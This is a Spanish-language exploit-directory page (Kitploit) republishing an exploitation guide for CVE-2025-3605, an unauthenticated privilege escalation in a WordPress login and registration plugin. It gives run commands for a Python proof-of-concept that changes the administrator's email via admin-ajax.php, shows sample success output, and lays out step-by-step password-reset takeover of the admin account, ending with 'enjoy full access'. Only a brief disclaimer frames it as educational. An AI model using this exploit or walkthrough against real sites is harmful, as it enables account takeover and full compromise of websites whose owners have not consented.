Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3605 — El plugin WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 es vulnerable a Escalada de Privilegios. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-3605
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-3605

CVE-2025-3605

El plugin WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 es vulnerable a Escalada de Privilegios.

Ver Repositorio
23hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 Guía de Explotación de CVE-2025-3605

🛡️ Resumen de la Vulnerabilidad

El plugin Frontend Login and Registration Blocks para WordPress (versiones <= 1.0.7) es vulnerable a escalada de privilegios mediante apropiación de cuentas.
El problema surge porque el plugin no valida la identidad del usuario al actualizar datos sensibles como el correo electrónico a través de la función flr_blocks_user_settings_handle_ajax_callback().

✅ Impacto:
Un atacante no autenticado puede cambiar el correo electrónico del administrador, activar el proceso de "Olvidé mi contraseña" y restablecer la contraseña del administrador, obteniendo control total.


💥 Prueba de Concepto (PoC)

El script Python incluido automatiza el proceso de explotación apuntando al endpoint AJAX vulnerable:

root@kitploit:~
/wp-admin/admin-ajax.php

Actualiza el correo electrónico del usuario objetivo (normalmente user_id 1 para el administrador) a un correo controlado por el atacante.


📦 Script Incluido

Nombre del archivo: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Valores por defecto:

  • --user_id: 1 (administrador por defecto)
  • --mail: [email protected]

🖥️ Uso y Ayuda

Para ver el menú de ayuda, ejecute:

root@kitploit:~
python CVE-2025-3605.py --help

Salida:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Ejemplo de Ejecución:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Salida Esperada

✅ En caso de éxito:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ En caso de fallo:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 Después de la Explotación

1️⃣ Navegue a:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Ingrese el nuevo correo electrónico que configuró ([email protected]).

3️⃣ Solicite un restablecimiento de contraseña.

4️⃣ Establezca una nueva contraseña.

5️⃣ Inicie sesión como administrador y disfrute del acceso completo.


⚠️ Aviso Legal

Este exploit y script se proporcionan solo con fines educativos y de pruebas autorizadas.
Cualquier uso no autorizado contra sistemas que no posea o para los que no tenga permiso explícito para probar es ilegal y poco ético.


Por: Khaled Alenazi (Nxploited)

Descargar herramienta